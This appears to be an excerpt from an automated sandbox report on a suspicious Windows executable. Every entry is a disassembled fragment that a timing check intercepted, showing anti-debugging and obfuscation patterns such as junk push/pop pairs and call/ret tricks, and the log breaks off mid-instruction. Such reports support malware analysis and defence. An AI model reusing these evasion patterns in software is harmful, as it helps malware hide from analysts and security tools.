Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9BA5BB second address: 9BA5BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9BA5BF second address: 9BA5CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9BAEA4 second address: 9BAEE4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E055074FCh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jc 00007F0E0550751Eh 0x00000011 jmp 00007F0E05507504h 0x00000016 jmp 00007F0E05507504h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9BAEE4 second address: 9BAF11 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0E05506D03h 0x00000008 jg 00007F0E05506CECh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9BB36E second address: 9BB372 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9BEDEE second address: 9BEDFA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jo 00007F0E05506CE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9C2658 second address: 9C265E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9C2CB6 second address: 9C2CBC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9C2CBC second address: 9C2CD6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0E05507505h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9C3C6C second address: 9C3C70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9C3C70 second address: 9C3C74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9C3C74 second address: 9C3CD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jl 00007F0E05506CF3h 0x0000000d jmp 00007F0E05506CEDh 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 pushad 0x00000017 jmp 00007F0E05506CEEh 0x0000001c jmp 00007F0E05506CF7h 0x00000021 popad 0x00000022 mov eax, dword ptr [eax] 0x00000024 push ecx 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F0E05506CF5h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9C3CD3 second address: 9C3CF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e jmp 00007F0E05507504h 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9C3ED7 second address: 9C3EE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0E05506CEAh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9C6C80 second address: 9C6CA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F0E05507508h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9C6CA3 second address: 9C6CA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9C6CA9 second address: 9C6CC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pushad 0x0000000b popad 0x0000000c pop edi 0x0000000d jne 00007F0E05507502h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9C6CC8 second address: 9C6CCD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9C6FCF second address: 9C6FDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007F0E055074F6h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9C6FDE second address: 9C6FF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05506CF3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9C7445 second address: 9C744B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9C744B second address: 9C748A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E05506CF4h 0x00000009 jmp 00007F0E05506CF4h 0x0000000e popad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 popad 0x00000015 pop edi 0x00000016 push ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 jl 00007F0E05506CE6h 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9C748A second address: 9C748E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9C75F3 second address: 9C75F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9C75F9 second address: 9C75FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9C75FF second address: 9C7607 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9CAA24 second address: 9CAA2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9CAA2A second address: 9CAA4D instructions: 0x00000000 rdtsc 0x00000002 je 00007F0E05506CE8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 6354CEF1h 0x00000013 movzx edi, dx 0x00000016 call 00007F0E05506CE9h 0x0000001b push esi 0x0000001c push edi 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9CAA4D second address: 9CAA5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9CAA5C second address: 9CAA61 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9CAE19 second address: 9CAE33 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0E055074F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F0E055074FCh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9CB09D second address: 9CB0A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9CB0A7 second address: 9CB0AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9CB4C2 second address: 9CB4C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9CB586 second address: 9CB58C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9CB7D5 second address: 9CB7D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9CB7D9 second address: 9CB7E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9CB7E3 second address: 9CB7E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9CB7E7 second address: 9CB7F3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edi 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9CB7F3 second address: 9CB7F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9CBA89 second address: 9CBAB1 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0E055074FCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov edi, dword ptr [ebp+122D35A2h] 0x00000013 push eax 0x00000014 je 00007F0E05507508h 0x0000001a push eax 0x0000001b push edx 0x0000001c jbe 00007F0E055074F6h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9CBAB1 second address: 9CBAB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9CBEFE second address: 9CBF03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9CBF03 second address: 9CBF09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9CBF09 second address: 9CBF5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 mov edi, dword ptr [ebp+122D361Ah] 0x0000000e push 00000000h 0x00000010 or edi, 503F157Dh 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push ebp 0x0000001b call 00007F0E055074F8h 0x00000020 pop ebp 0x00000021 mov dword ptr [esp+04h], ebp 0x00000025 add dword ptr [esp+04h], 00000014h 0x0000002d inc ebp 0x0000002e push ebp 0x0000002f ret 0x00000030 pop ebp 0x00000031 ret 0x00000032 xchg eax, ebx 0x00000033 jmp 00007F0E05507501h 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b jnp 00007F0E055074F8h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9CBF5A second address: 9CBF5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9CC96D second address: 9CC993 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05507502h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F0E055074FDh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9CC7F5 second address: 9CC7FB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9CC7FB second address: 9CC801 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9CEFFF second address: 9CF009 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F0E05506CE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9CF009 second address: 9CF00D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9CF00D second address: 9CF055 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F0E05506CF5h 0x0000000e nop 0x0000000f mov edi, dword ptr [ebp+122D362Ah] 0x00000015 push 00000000h 0x00000017 stc 0x00000018 push 00000000h 0x0000001a xor di, D20Ah 0x0000001f xchg eax, ebx 0x00000020 pushad 0x00000021 jnc 00007F0E05506CF3h 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9CF055 second address: 9CF059 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9CED8C second address: 9CED96 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0E05506CE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9CFAE0 second address: 9CFAE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9CFAE5 second address: 9CFAEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9D0ED3 second address: 9D0ED8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9D0ED8 second address: 9D0F3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F0E05506CE6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007F0E05506CE8h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 00000018h 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push esi 0x00000030 call 00007F0E05506CE8h 0x00000035 pop esi 0x00000036 mov dword ptr [esp+04h], esi 0x0000003a add dword ptr [esp+04h], 00000017h 0x00000042 inc esi 0x00000043 push esi 0x00000044 ret 0x00000045 pop esi 0x00000046 ret 0x00000047 mov esi, dword ptr [ebp+122D1B25h] 0x0000004d push 00000000h 0x0000004f mov dword ptr [ebp+122D19F2h], edi 0x00000055 xchg eax, ebx 0x00000056 push ecx 0x00000057 push ebx 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9D0F3D second address: 9D0F4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 js 00007F0E05507500h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9D24D5 second address: 9D24DF instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0E05506CE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9D2A45 second address: 9D2ABB instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0E055074F8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007F0E055074F8h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 mov ebx, eax 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push esi 0x0000002c call 00007F0E055074F8h 0x00000031 pop esi 0x00000032 mov dword ptr [esp+04h], esi 0x00000036 add dword ptr [esp+04h], 0000001Dh 0x0000003e inc esi 0x0000003f push esi 0x00000040 ret 0x00000041 pop esi 0x00000042 ret 0x00000043 mov di, bx 0x00000046 push 00000000h 0x00000048 sbb bx, 6F35h 0x0000004d xchg eax, esi 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007F0E05507503h 0x00000055 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9D2ABB second address: 9D2AE2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05506CEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0E05506CF1h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9D2AE2 second address: 9D2AE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9D4C0A second address: 9D4C0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9D4C0E second address: 9D4C39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F0E0550750Fh 0x0000000c jmp 00007F0E05507509h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9D4C39 second address: 9D4C3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9D5C31 second address: 9D5C51 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0E055074FCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e jmp 00007F0E055074FBh 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9D025D second address: 9D0267 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F0E05506CE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9D7B3D second address: 9D7B59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E05507508h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9D7B59 second address: 9D7B5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9D8C26 second address: 9D8C30 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0E055074FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9DAC3D second address: 9DAC41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9DAC41 second address: 9DAC47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9DAC47 second address: 9DAC51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F0E05506CE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 98375B second address: 98375F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 98375F second address: 983765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 983765 second address: 98376E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9D0CA9 second address: 9D0CAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9D3CF5 second address: 9D3CFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9E018A second address: 9E01B0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F0E05506CF7h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push edi 0x00000010 pop edi 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9E224F second address: 9E2254 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9E2254 second address: 9E2259 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9D9F35 second address: 9D9F3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9D9F3E second address: 9D9F42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9E3370 second address: 9E33E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dword ptr [esp], eax 0x00000007 push 00000000h 0x00000009 push esi 0x0000000a call 00007F0E055074F8h 0x0000000f pop esi 0x00000010 mov dword ptr [esp+04h], esi 0x00000014 add dword ptr [esp+04h], 00000018h 0x0000001c inc esi 0x0000001d push esi 0x0000001e ret 0x0000001f pop esi 0x00000020 ret 0x00000021 cmc 0x00000022 xor bx, C346h 0x00000027 push 00000000h 0x00000029 movzx ebx, dx 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push esi 0x00000031 call 00007F0E055074F8h 0x00000036 pop esi 0x00000037 mov dword ptr [esp+04h], esi 0x0000003b add dword ptr [esp+04h], 0000001Bh 0x00000043 inc esi 0x00000044 push esi 0x00000045 ret 0x00000046 pop esi 0x00000047 ret 0x00000048 sub dword ptr [ebp+122DB53Ah], ebx 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007F0E05507503h 0x00000056 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9E13DD second address: 9E145B instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0E05506CECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F0E05506CE8h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 push dword ptr fs:[00000000h] 0x0000002e jmp 00007F0E05506CF4h 0x00000033 mov dword ptr fs:[00000000h], esp 0x0000003a pushad 0x0000003b mov dword ptr [ebp+122D2E61h], ecx 0x00000041 popad 0x00000042 mov eax, dword ptr [ebp+122D0D35h] 0x00000048 stc 0x00000049 push FFFFFFFFh 0x0000004b mov bx, 873Ah 0x0000004f nop 0x00000050 js 